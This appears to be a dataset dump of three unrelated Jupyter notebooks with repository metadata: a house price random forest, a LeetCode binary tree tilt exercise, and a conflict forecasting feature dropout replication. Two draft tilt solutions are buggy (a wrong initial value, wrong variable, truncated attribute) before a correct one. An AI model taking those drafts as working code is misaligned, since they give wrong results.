[ [ [ "import import_ipynb\nfrom Helpers import *\nimport pandas as pd\nimport numpy as np\nimport sklearn\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import make_pipeline, Pipeline\n\nfrom sklearn.model_selection import cross_val_score, GridSearchCV,cross_val_predict\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.preprocessing import MinMaxScaler", "importing Jupyter notebook from Helpers.ipynb\n" ], [ "train = pd.read_csv('train.csv')\ntest = pd.read_csv('test.csv')\n\ntest_ids = test['Id']", "_____no_output_____" ], [ "\n\n\n# class HomePreprocessor:\n# def __init__(self, drop_low_correlated=False):\n# self.drop_low_correlated = drop_low_correlated\n\n# def fit(self, X, y=None):\n# return self\n\n# def transform(self, X, *_):\n\n# if (drop_low_correlated):\n# X=X.pipe(drop_non_correlated_columns, min_corr=ignoreUncorrelatedRate)\n \n# df = df.pipe(drop_columns, columns=high_nan_columns) # high number of NA values \n# .pipe(drop_columns, columns=no_variety_columns) # no variety\n\n# .pipe(fill_NA, columns=columnsToFillNone, value='None') # \n# .pipe(fill_NA, columns=columnsToFillZero, value=0) # \n# .pipe(get_dummies_for_category_columns, columns=X.columns[X.dtypes==\"object\"])\n# .pipe(get_dummies_for_category_columns, columns=categoryColumns2)\n# .pipe(set_type, 'MasVnrArea','int64')\n# .pipe(year_to_age, 'YearBuilt')\n# .pipe(year_to_age, 'YearRemodAdd')\n# .pipe(year_to_age, 'YrSold')\n# .pipe(drop_columns, columns=[\"Id\",\"BedroomAbvGr\"])## drop Garbage\n# .pipe(log_tranform, columns=areaColumns) \n# return X\n\n# train = preprocess(train).pipe(drop_non_correlated_columns, min_corr=ignoreUncorrelatedRate) \n# test_ids=test['Id']\n# test = preprocess(test)\n", "_____no_output_____" ], [ "\ny_train = np.log(train['SalePrice'])\n#y_test = np.log(test['SalePrice'])\n\ncs = ColumnSelector(columns=['GrLivArea', 'YearBuilt', 'OverallQual','MSSubClass'])\ndt = DummiesTransformer(column='MSSubClass', keys=[ 20, 30, 40, 45, 50, 60, 70, 75, 80, 85, 90, 120, 150, 160, 180, 190])\npp = Pipeline(\n [('SelectColumns', cs),('Dummies', dt)])\nX_train = pp.fit_transform(train)\nX_test = pp.fit_transform(test)\n\n\n\n# Perform Grid-Search\ngsc = GridSearchCV(\n estimator=RandomForestRegressor(),\n param_grid={\n 'max_depth': range(8,10),\n 'n_estimators': ( 50, 100, 1000, 2000),\n },\n cv=5, scoring='neg_mean_squared_error', verbose=0, n_jobs=-1)\n\ngrid_result = gsc.fit(X_train, y_train)\nbest_params = grid_result.best_params_\nprint(best_params)\nrfr = RandomForestRegressor(max_depth=best_params[\"max_depth\"], n_estimators=best_params[\"n_estimators\"],\n random_state=False, verbose=False)\n\n\nscores = cross_val_score(rfr, X_train, y_train, cv=10, scoring='neg_mean_squared_error')\nprint(scores)", "/Users/drmegavolt/miniconda3/envs/home_iowa/lib/python3.7/site-packages/sklearn/base.py:553: FutureWarning: specifying 'categories' or 'ordered' in .astype() is deprecated; pass a CategoricalDtype instead\n return self.fit(X, **fit_params).transform(X)\nHelpers.ipynb:89: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy\n \"\\n\",\n" ], [ "#sklearn.metrics.SCORERS.keys()\nrfr.fit(X_train, y_train)\npredictions = rfr.predict( X_test)", "_____no_output_____" ], [ "result=np.exp(predictions)", "_____no_output_____" ], [ "result", "_____no_output_____" ], [ "dfR = pd.DataFrame(test_ids,columns=['Id'])\ndfR['SalePrice']=result\ndfR.to_csv('predictions.csv',index = None, header=True)\nprint(dfR.head())", " Id SalePrice\n0 1461 124001.319589\n1 1462 152603.917946\n2 1463 166300.380937\n3 1464 181007.865275\n4 1465 202710.594751\n" ], [ "test.columns[test.isnull().sum()>0]", "_____no_output_____" ], [ "test['MiscFeature'].unique()", "_____no_output_____" ], [ "(test['BsmtFullBath']+0.5*test.BsmtHalfBath).isnull()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e730f139847546fc35781e222aa82025ff42f54d
3,556
ipynb
Jupyter Notebook
Tree/1020/563. Binary Tree Tilt.ipynb
YuHe0108/Leetcode
90d904dde125dd35ee256a7f383961786f1ada5d
[ "Apache-2.0" ]
1
2020-08-05T11:47:47.000Z
2020-08-05T11:47:47.000Z
Tree/1020/563. Binary Tree Tilt.ipynb
YuHe0108/LeetCode
b9e5de69b4e4d794aff89497624f558343e362ad
[ "Apache-2.0" ]
null
null
null
Tree/1020/563. Binary Tree Tilt.ipynb
YuHe0108/LeetCode
b9e5de69b4e4d794aff89497624f558343e362ad
[ "Apache-2.0" ]
null
null
null
24.867133
62
0.412261
[ [ [ "说明:\n 给定一个二叉树,计算整个树的坡度。\n 一个树的节点的坡度定义即为:\n 该节点左子树的结点之和和右子树结点之和的差的绝对值。空结点的的坡度是0。\n 整个树的坡度就是其所有节点的坡度之和。\n\n示例:\n 输入:\n 1\n / \\\n 2 3\n 输出:1\n 解释:\n 结点 2 的坡度: 0\n 结点 3 的坡度: 0\n 结点 1 的坡度: |2-3| = 1\n 树的坡度 : 0 + 0 + 1 = 1\n \n提示:\n 1、任何子树的结点的和不会超过 32 位整数的范围。\n 2、坡度的值不会超过 32 位整数的范围。", "_____no_output_____" ] ], [ [ "def __init__(self):\n self.tilt = 0\n\ndef findTilt(self, root: TreeNode) -> int:\n # null node equals to node whose value is 0\n self.calc(root)\n return self.tilt\n\ndef calc(self, root):\n if not root:\n return 0\n\n l = r = 0\n if root.left:\n l = self.calc(root.left)\n if root.right:\n r = self.calc(root.right)\n\n self.tilt += abs(l-r)\n return l + r + root.va", "_____no_output_____" ], [ "class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n \nclass Solution:\n def findTilt(self, root: TreeNode) -> int:\n tree_tilt = 3\n \n def dfs(node):\n nonlocal tree_tilt\n \n if not root:\n return 0\n l = r = 0\n if root.left:\n l = self.dfs(root.left)\n if root.right:\n r = self.dfs(root.right)\n tree_tilt += abs(l - r)\n \n dfs(root)\n return tree_tilt ", "_____no_output_____" ], [ "class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def findTilt(self, root: TreeNode) -> int:\n self.tree_tilt = 0\n self.dfs(root)\n return self.tree_tilt\n \n def dfs(self, root):\n if not root:\n return 0\n l = r = 0\n if root.left:\n l = self.dfs(root.left)\n if root.right:\n r = self.dfs(root.right)\n self.tree_tilt += abs(l - r)\n return l + r + root.val", "_____no_output_____" ] ] ]
[ "raw", "code" ]
[ [ "raw" ], [ "code", "code", "code" ] ]
e730f98236418f73b6c3f9369b3297fc4e9ca304
28,168
ipynb
Jupyter Notebook
supplemental_replication_files/feature_dropout/run_feature_dropout.ipynb
benradford/high-resolution-conflict-forecasting
675221e479a7b575fd3d978812d0938c1040a37d
[ "MIT" ]
null
null
null
supplemental_replication_files/feature_dropout/run_feature_dropout.ipynb
benradford/high-resolution-conflict-forecasting
675221e479a7b575fd3d978812d0938c1040a37d
[ "MIT" ]
null
null
null
supplemental_replication_files/feature_dropout/run_feature_dropout.ipynb
benradford/high-resolution-conflict-forecasting
675221e479a7b575fd3d978812d0938c1040a37d
[ "MIT" ]
null
null
null
39.45098
145
0.490486
[ [ [ "# High Resolution Conflict Forecasting with Spatial Convolutions and Long Short-Term Memory\n\n## Replication Archive\n\n[Benjamin J. Radford](https://www.benradford.com) \nAssistant Professor \nUNC Charlotte \[email protected] \n\nThis file produces all necessary data for the feature dropout study. \n\n**Warning:** This file may take several days to run depending on your computer's speed.\n\n## Imports and seeds", "_____no_output_____" ] ], [ [ "import sys\nimport os\nimport gc\nimport logging\n\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom joblib import dump, load\n\nfrom itertools import product\nfrom math import isnan\n\nimport views\nfrom views import Period, Model, Downsampling\nfrom views.utils.data import assign_into_df\nfrom views.apps.transforms import lib as translib\nfrom views.apps.evaluation import lib as evallib, feature_importance as fi\nfrom views.apps.model import api\nfrom views.apps.extras import extras\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Input, ConvLSTM2D, Activation, Conv3D, BatchNormalization, Dropout, Bidirectional, GaussianNoise\nfrom keras import optimizers\n\nimport tensorflow as tf\n\nimport random\nimport geoplot as gplt\nimport contextily as ctx\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import AxesGrid\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nfrom numpy.random import seed\nseed(1234)\ntf.random.set_seed(1234)\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\npgid_groupa = [149426,149427,149428,149429,149430, 148706,148707,148708,148709,148710, 147986,\n147987,147988,147989,147990, 147266,147267,147268,147269,147270, 146546,146547,146548,\n146549,146550]\n\npgid_groupb = [114918,114919,114920,114921,114922, 114198,114199,114200,114201,114202, 113478,\n113479,113480,113481,113482, 112758,112759,112760,112761,112762, 112038,112039,112040,\n112041,112042]\n\ncols_feats = [\n \"ln_ged_best_sb\",\n \"pgd_bdist3\",\n \"pgd_capdist\",\n \"pgd_agri_ih\",\n \"pgd_pop_gpw_sum\",\n \"pgd_ttime_mean\",\n \"spdist_pgd_diamsec\",\n \"pgd_pasture_ih\",\n \"pgd_savanna_ih\",\n \"pgd_forest_ih\",\n \"pgd_urban_ih\",\n \"pgd_barren_ih\",\n \"pgd_gcp_mer\"\n]\n\n\n\nmodel = keras.models.load_model(\"../../supplemental_data/competition_model/model_competition_entry.h5\")\n\nmodel.summary()\n\ngc.collect()", "_____no_output_____" ], [ "# Do you wish to fetch the latest public data? If so, change False to True and run this cell\n# Cells below will fail if this is not run if you haven't imported data yourself yet.\n\nredownload_data = False\n\nif redownload_data:\n path_zip = views.apps.data.public.fetch_latest_zip_from_website(path_dir_destination=views.DIR_SCRATCH)\n views.apps.data.public.import_tables_and_geoms(tables=views.TABLES, geometries=views.GEOMETRIES, path_zip=path_zip)\n\ndataset = views.DATASETS[\"pgm_africa_imp_0\"]\ndf = dataset.gdf\ndf.reset_index(inplace=True)\n\nupdate = pd.read_csv(\"../../data/pgm.csv\")\ndf = pd.merge(df[[\"geom\",\"pg_id\",\"month_id\"]], update, on=[\"pg_id\",\"month_id\"])\n\ndf = df.loc[(df[\"year\"]<2021) & (df[\"year\"]>1989)]\ndf = df.loc[(df[\"year\"]<2020) | (df[\"month\"]<9)]\ndf[\"coordx\"] = df[\"geom\"].apply(lambda x: x.centroid.x)\ndf[\"coordy\"] = df[\"geom\"].apply(lambda y: y.centroid.y)\ndf[\"col_idx\"] = [int(a) for a in list((df[\"coordx\"] - df[\"coordx\"].min())*2)]\ndf[\"row_idx\"] = [int(a) for a in list((df[\"coordy\"] - df[\"coordy\"].min())*2)]\ndf[\"year_idx\"] = [int(a) for a in list((df[\"year\"] - df[\"year\"].min()))]\ndf[\"month_idx\"] = [int(a) for a in list((df[\"month\"] - df[\"month\"].min()))]\ndf[\"year_month_idx\"] = [int(a) for a in list((df[\"month_id\"] - df[\"month_id\"].min()))]\n\ndf.drop(\"geom\", inplace=True, axis=1)\n\n\n##\n## Make Lags\n##\ndf1 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf2 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf3 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf4 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf5 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf6 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\ndf7 = df[[\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb\"]].copy()\n\ndf1[\"year_month_idx\"] = df1[\"year_month_idx\"]+1\ndf2[\"year_month_idx\"] = df2[\"year_month_idx\"]+2\ndf3[\"year_month_idx\"] = df3[\"year_month_idx\"]+3\ndf4[\"year_month_idx\"] = df4[\"year_month_idx\"]+4\ndf5[\"year_month_idx\"] = df5[\"year_month_idx\"]+5\ndf6[\"year_month_idx\"] = df6[\"year_month_idx\"]+6\ndf7[\"year_month_idx\"] = df7[\"year_month_idx\"]+7\n\ndf1.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l1\"]\ndf2.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l2\"]\ndf3.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l3\"]\ndf4.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l4\"]\ndf5.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l5\"]\ndf6.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l6\"]\ndf7.columns = [\"year_month_idx\",\"pg_id\",\"ln_ged_best_sb_l7\"]\n\ndf = pd.merge(df,df1,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df2,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df3,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df4,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df5,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df6,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\ndf = pd.merge(df,df7,how=\"left\",on=[\"year_month_idx\",\"pg_id\"])\n\ndf[\"delta_1\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l1\"]\ndf[\"delta_2\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l2\"]\ndf[\"delta_3\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l3\"]\ndf[\"delta_4\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l4\"]\ndf[\"delta_5\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l5\"]\ndf[\"delta_6\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l6\"]\ndf[\"delta_7\"] = df[\"ln_ged_best_sb\"] - df[\"ln_ged_best_sb_l7\"]\n\ndel df1\ndel df2\ndel df3\ndel df4\ndel df5\ndel df6\ndel df7\n\ngc.collect()\n\ncols_ids = [\n \"col_idx\",\n \"row_idx\",\n \"pg_id\",\n \"year\",\n \"month\",\n \"year_idx\",\n \"month_idx\",\n \"year_month_idx\"]\n\ncols_lags = [\n \"delta_1\",\n \"delta_2\",\n \"delta_3\",\n \"delta_4\",\n \"delta_5\",\n \"delta_6\",\n \"delta_7\"\n]\n\ndf_background = df.copy()", "_____no_output_____" ], [ "for ii, median_var in enumerate(cols_feats):\n print(median_var)\n\n df = df_background.copy()\n df.loc[df[\"pg_id\"].isin(pgid_groupa + pgid_groupb),median_var] = df[median_var].median()\n\n\n subset = df[cols_feats+cols_ids]\n\n ##\n ## Fill in missing grid cells (e.g. water)\n ## \n all_cells = product(\n list(range(max(subset[\"year_month_idx\"])+1)),\n list(range(max(subset[\"col_idx\"])+1)),\n list(range(max(subset[\"row_idx\"])+1))\n )\n\n all_cells = pd.DataFrame(all_cells,\n columns=[\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])\n\n subset = pd.merge(subset, all_cells, how=\"outer\",\n on=[\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])\n\n subset[\"isnan\"] = subset[cols_feats].apply(lambda x: int(any([isnan(a) for a in x])), axis=1)\n subset.fillna(0, inplace=True)\n\n X_grouped = subset.groupby([\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])[cols_feats+[\"isnan\"]].mean()\n X_grouped.head()\n\n arr = X_grouped.values.reshape((len(X_grouped.index.unique(level=0)),\n len(X_grouped.index.unique(level=1)),\n len(X_grouped.index.unique(level=2)),\n len(cols_feats)+1))\n\n del subset\n gc.collect()\n\n X = arr[:,:,:,:]\n Y = arr[:,:,:,0]\n\n Y1 = Y[1:] - Y[0:-1]\n Y2 = Y[2:] - Y[0:-2]\n Y3 = Y[3:] - Y[0:-3]\n Y4 = Y[4:] - Y[0:-4]\n Y5 = Y[5:] - Y[0:-5]\n Y6 = Y[6:] - Y[0:-6]\n Y7 = Y[7:] - Y[0:-7]\n\n filler1 = np.full_like(np.zeros((1,178,169)),np.NaN)\n filler2 = np.full_like(np.zeros((2,178,169)),np.NaN)\n filler3 = np.full_like(np.zeros((3,178,169)),np.NaN)\n filler4 = np.full_like(np.zeros((4,178,169)),np.NaN)\n filler5 = np.full_like(np.zeros((5,178,169)),np.NaN)\n filler6 = np.full_like(np.zeros((6,178,169)),np.NaN)\n filler7 = np.full_like(np.zeros((7,178,169)),np.NaN)\n\n Y1 = np.concatenate((Y1, filler1), axis=0)\n Y2 = np.concatenate((Y2, filler2), axis=0)\n Y3 = np.concatenate((Y3, filler3), axis=0)\n Y4 = np.concatenate((Y4, filler4), axis=0)\n Y5 = np.concatenate((Y5, filler5), axis=0)\n Y6 = np.concatenate((Y6, filler6), axis=0)\n Y7 = np.concatenate((Y7, filler7), axis=0)\n\n YDelta = np.stack((Y1,Y2,Y3,Y4,Y5,Y6,Y7), axis=3)\n\n del Y1\n del Y2\n del Y3\n del Y4\n del Y5\n del Y6\n del Y7\n gc.collect()\n\n pred_months = 12\n\n all_preds = []\n\n for ii in range(0,X.shape[0]):\n all_preds.append( \n np.squeeze( \n model.predict( \n np.array([X[max(0,ii-pred_months+1):(ii+1)]])\n )\n )\n )\n\n gc.collect()\n\n# np.save(\"../../supplemental_data/feature_dropout/bjr_all_preds_drop_in_\"+median_var+\".npy\", all_preds)", "_____no_output_____" ], [ "for ii, median_var in enumerate(cols_feats):\n print(median_var)\n df = df_background.copy()\n\n df.loc[~df[\"pg_id\"].isin(pgid_groupa + pgid_groupb),median_var] = df[median_var].median()\n\n\n subset = df[cols_feats+cols_ids]\n\n ##\n ## Fill in missing grid cells (e.g. water)\n ## \n all_cells = product(\n list(range(max(subset[\"year_month_idx\"])+1)),\n list(range(max(subset[\"col_idx\"])+1)),\n list(range(max(subset[\"row_idx\"])+1))\n )\n\n all_cells = pd.DataFrame(all_cells,\n columns=[\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])\n\n subset = pd.merge(subset, all_cells, how=\"outer\",\n on=[\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])\n\n subset[\"isnan\"] = subset[cols_feats].apply(lambda x: int(any([isnan(a) for a in x])), axis=1)\n subset.fillna(0, inplace=True)\n\n X_grouped = subset.groupby([\"year_month_idx\",\n \"col_idx\",\n \"row_idx\"])[cols_feats+[\"isnan\"]].mean()\n X_grouped.head()\n\n arr = X_grouped.values.reshape((len(X_grouped.index.unique(level=0)),\n len(X_grouped.index.unique(level=1)),\n len(X_grouped.index.unique(level=2)),\n len(cols_feats)+1))\n\n del subset\n gc.collect()\n\n X = arr[:,:,:,:]\n Y = arr[:,:,:,0]\n\n Y1 = Y[1:] - Y[0:-1]\n Y2 = Y[2:] - Y[0:-2]\n Y3 = Y[3:] - Y[0:-3]\n Y4 = Y[4:] - Y[0:-4]\n Y5 = Y[5:] - Y[0:-5]\n Y6 = Y[6:] - Y[0:-6]\n Y7 = Y[7:] - Y[0:-7]\n\n filler1 = np.full_like(np.zeros((1,178,169)),np.NaN)\n filler2 = np.full_like(np.zeros((2,178,169)),np.NaN)\n filler3 = np.full_like(np.zeros((3,178,169)),np.NaN)\n filler4 = np.full_like(np.zeros((4,178,169)),np.NaN)\n filler5 = np.full_like(np.zeros((5,178,169)),np.NaN)\n filler6 = np.full_like(np.zeros((6,178,169)),np.NaN)\n filler7 = np.full_like(np.zeros((7,178,169)),np.NaN)\n\n Y1 = np.concatenate((Y1, filler1), axis=0)\n Y2 = np.concatenate((Y2, filler2), axis=0)\n Y3 = np.concatenate((Y3, filler3), axis=0)\n Y4 = np.concatenate((Y4, filler4), axis=0)\n Y5 = np.concatenate((Y5, filler5), axis=0)\n Y6 = np.concatenate((Y6, filler6), axis=0)\n Y7 = np.concatenate((Y7, filler7), axis=0)\n\n YDelta = np.stack((Y1,Y2,Y3,Y4,Y5,Y6,Y7), axis=3)\n\n del Y1\n del Y2\n del Y3\n del Y4\n del Y5\n del Y6\n del Y7\n gc.collect()\n\n pred_months = 12\n\n all_preds = []\n\n for ii in range(0,X.shape[0]):\n all_preds.append( \n np.squeeze( \n model.predict( \n np.array([X[max(0,ii-pred_months+1):(ii+1)]])\n )\n )\n )\n\n gc.collect()\n\n# np.save(\"../../supplemental_data/feature_dropout/bjr_all_preds_drop_out_\"+median_var+\".npy\", all_preds)", "_____no_output_____" ], [ "all_preds = np.load(\"../../supplemental_data/competition_model/competition_entry_predictions.npy\")\n\nout_df = df_background[[\"pg_id\",\"col_idx\",\"row_idx\",\"month_id\",\"year\",\"year_month_idx\",\n \"delta_1\",\"delta_2\",\"delta_3\",\"delta_4\",\"delta_5\",\"delta_6\",\"delta_7\"]].copy()\npg_col_row = df[[\"pg_id\",\"col_idx\",\"row_idx\"]].drop_duplicates()\npg_col_row = pd.concat([pg_col_row] * 7)\npg_col_row[\"month_id\"] = ([489]*10677) + ([490]*10677) + ([491]*10677) + ([492]*10677) + ([493]*10677) + ([494]*10677) + ([495]*10677)\npg_col_row[\"year_month_idx\"] = pg_col_row[\"month_id\"] - 121\n\nprint(out_df.shape)\nprint(pg_col_row.shape)\nout_df = pd.concat([out_df,pg_col_row])\nout_df.reset_index(inplace=True)\nprint(out_df.shape)\n\n\n \nfor median_var in cols_feats:\n new_preds = np.load(\"../../supplemental_data/feature_dropout/bjr_all_preds_drop_in_\"+median_var+\".npy\")\n \n# future = all_preds[-1,:,:,:]\n \n # out_df[[\"pred_l1\",\"pred_l2\",\"pred_l3\",\"pred_l4\",\"pred_l5\",\"pred_l6\"]] = None\n\n preds_l1 = [None] * out_df.shape[0]\n gc.collect()\n preds_l2 = [None] * out_df.shape[0]\n gc.collect()\n preds_l3 = [None] * out_df.shape[0]\n gc.collect()\n preds_l4 = [None] * out_df.shape[0]\n gc.collect()\n preds_l5 = [None] * out_df.shape[0]\n gc.collect()\n preds_l6 = [None] * out_df.shape[0]\n gc.collect()\n preds_l7 = [None] * out_df.shape[0]\n gc.collect()\n \n preds_l1_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l2_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l3_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l4_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l5_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l6_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l7_b = [None] * out_df.shape[0]\n gc.collect()\n\n print(\"\\tLoop time, baby...\")\n\n jj = 0\n\n for ii, row in out_df.iterrows():\n\n if jj%1000000 == 0:\n print(f\"\\t{jj} of {out_df.shape[0]}\")\n gc.collect()\n\n col_idx = int(row[\"col_idx\"])\n row_idx = int(row[\"row_idx\"])\n year_month_idx = int(row[\"year_month_idx\"])\n\n if year_month_idx > 0:\n try:\n preds_l1[jj] = all_preds[year_month_idx-1,col_idx,row_idx,0]\n preds_l1_b[jj] = new_preds[year_month_idx-1,col_idx,row_idx,0]\n except:\n pass\n\n if year_month_idx > 1:\n try:\n preds_l2[jj] = all_preds[year_month_idx-2,col_idx,row_idx,1]\n preds_l2_b[jj] = new_preds[year_month_idx-2,col_idx,row_idx,1]\n except:\n pass\n\n if year_month_idx > 2:\n try:\n preds_l3[jj] = all_preds[year_month_idx-3,col_idx,row_idx,2]\n preds_l3_b[jj] = new_preds[year_month_idx-3,col_idx,row_idx,2]\n except:\n pass\n\n if year_month_idx > 3:\n try:\n preds_l4[jj] = all_preds[year_month_idx-4,col_idx,row_idx,3]\n preds_l4_b[jj] = new_preds[year_month_idx-4,col_idx,row_idx,3]\n except:\n pass\n\n if year_month_idx > 4:\n try:\n preds_l5[jj] = all_preds[year_month_idx-5,col_idx,row_idx,4]\n preds_l5_b[jj] = new_preds[year_month_idx-5,col_idx,row_idx,4]\n except:\n pass\n\n if year_month_idx > 5:\n try:\n preds_l6[jj] = all_preds[year_month_idx-6,col_idx,row_idx,5]\n preds_l6_b[jj] = new_preds[year_month_idx-6,col_idx,row_idx,5]\n except:\n pass\n\n if year_month_idx > 6:\n try:\n preds_l7[jj] = all_preds[year_month_idx-7,col_idx,row_idx,6]\n preds_l7_b[jj] = new_preds[year_month_idx-7,col_idx,row_idx,6]\n except:\n pass\n\n jj = jj+1\n\n out_df[\"Radford_clstm_s1\"] = preds_l1\n out_df[\"Radford_clstm_s2\"] = preds_l2\n out_df[\"Radford_clstm_s3\"] = preds_l3\n out_df[\"Radford_clstm_s4\"] = preds_l4\n out_df[\"Radford_clstm_s5\"] = preds_l5\n out_df[\"Radford_clstm_s6\"] = preds_l6\n out_df[\"Radford_clstm_s7\"] = preds_l7\n out_df[\"Radford_clstm_s1_drop_in_\"+median_var] = preds_l1_b\n out_df[\"Radford_clstm_s2_drop_in_\"+median_var] = preds_l2_b\n out_df[\"Radford_clstm_s3_drop_in_\"+median_var] = preds_l3_b\n out_df[\"Radford_clstm_s4_drop_in_\"+median_var] = preds_l4_b\n out_df[\"Radford_clstm_s5_drop_in_\"+median_var] = preds_l5_b\n out_df[\"Radford_clstm_s6_drop_in_\"+median_var] = preds_l6_b\n out_df[\"Radford_clstm_s7_drop_in_\"+median_var] = preds_l7_b\n \nfor median_var in cols_feats:\n new_preds = np.load(\"../../supplemental_data/feature_dropout/bjr_all_preds_drop_out_\"+median_var+\".npy\")\n \n # out_df[[\"pred_l1\",\"pred_l2\",\"pred_l3\",\"pred_l4\",\"pred_l5\",\"pred_l6\"]] = None\n\n preds_l1 = [None] * out_df.shape[0]\n gc.collect()\n preds_l2 = [None] * out_df.shape[0]\n gc.collect()\n preds_l3 = [None] * out_df.shape[0]\n gc.collect()\n preds_l4 = [None] * out_df.shape[0]\n gc.collect()\n preds_l5 = [None] * out_df.shape[0]\n gc.collect()\n preds_l6 = [None] * out_df.shape[0]\n gc.collect()\n preds_l7 = [None] * out_df.shape[0]\n gc.collect()\n \n preds_l1_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l2_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l3_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l4_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l5_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l6_b = [None] * out_df.shape[0]\n gc.collect()\n preds_l7_b = [None] * out_df.shape[0]\n gc.collect()\n\n print(\"\\tLoop time, baby.\")\n\n jj = 0\n\n for ii, row in out_df.iterrows():\n\n if jj%1000000 == 0:\n print(f\"\\t{jj} of {out_df.shape[0]}\")\n gc.collect()\n\n col_idx = int(row[\"col_idx\"])\n row_idx = int(row[\"row_idx\"])\n year_month_idx = int(row[\"year_month_idx\"])\n\n if year_month_idx > 0:\n try:\n preds_l1[jj] = all_preds[year_month_idx-1,col_idx,row_idx,0]\n preds_l1_b[jj] = new_preds[year_month_idx-1,col_idx,row_idx,0]\n except:\n pass\n\n if year_month_idx > 1:\n try:\n preds_l2[jj] = all_preds[year_month_idx-2,col_idx,row_idx,1]\n preds_l2_b[jj] = new_preds[year_month_idx-2,col_idx,row_idx,1]\n except:\n pass\n\n if year_month_idx > 2:\n try:\n preds_l3[jj] = all_preds[year_month_idx-3,col_idx,row_idx,2]\n preds_l3_b[jj] = new_preds[year_month_idx-3,col_idx,row_idx,2]\n except:\n pass\n\n if year_month_idx > 3:\n try:\n preds_l4[jj] = all_preds[year_month_idx-4,col_idx,row_idx,3]\n preds_l4_b[jj] = new_preds[year_month_idx-4,col_idx,row_idx,3]\n except:\n pass\n\n if year_month_idx > 4:\n try:\n preds_l5[jj] = all_preds[year_month_idx-5,col_idx,row_idx,4]\n preds_l5_b[jj] = new_preds[year_month_idx-5,col_idx,row_idx,4]\n except:\n pass\n\n if year_month_idx > 5:\n try:\n preds_l6[jj] = all_preds[year_month_idx-6,col_idx,row_idx,5]\n preds_l6_b[jj] = new_preds[year_month_idx-6,col_idx,row_idx,5]\n except:\n pass\n\n if year_month_idx > 6:\n try:\n preds_l7[jj] = all_preds[year_month_idx-7,col_idx,row_idx,6]\n preds_l7_b[jj] = new_preds[year_month_idx-7,col_idx,row_idx,6]\n except:\n pass\n\n jj = jj+1\n\n out_df[\"Radford_clstm_s1\"] = preds_l1\n out_df[\"Radford_clstm_s2\"] = preds_l2\n out_df[\"Radford_clstm_s3\"] = preds_l3\n out_df[\"Radford_clstm_s4\"] = preds_l4\n out_df[\"Radford_clstm_s5\"] = preds_l5\n out_df[\"Radford_clstm_s6\"] = preds_l6\n out_df[\"Radford_clstm_s7\"] = preds_l7\n out_df[\"Radford_clstm_s1_drop_out_\"+median_var] = preds_l1_b\n out_df[\"Radford_clstm_s2_drop_out_\"+median_var] = preds_l2_b\n out_df[\"Radford_clstm_s3_drop_out_\"+median_var] = preds_l3_b\n out_df[\"Radford_clstm_s4_drop_out_\"+median_var] = preds_l4_b\n out_df[\"Radford_clstm_s5_drop_out_\"+median_var] = preds_l5_b\n out_df[\"Radford_clstm_s6_drop_out_\"+median_var] = preds_l6_b\n out_df[\"Radford_clstm_s7_drop_out_\"+median_var] = preds_l7_b\n \n# 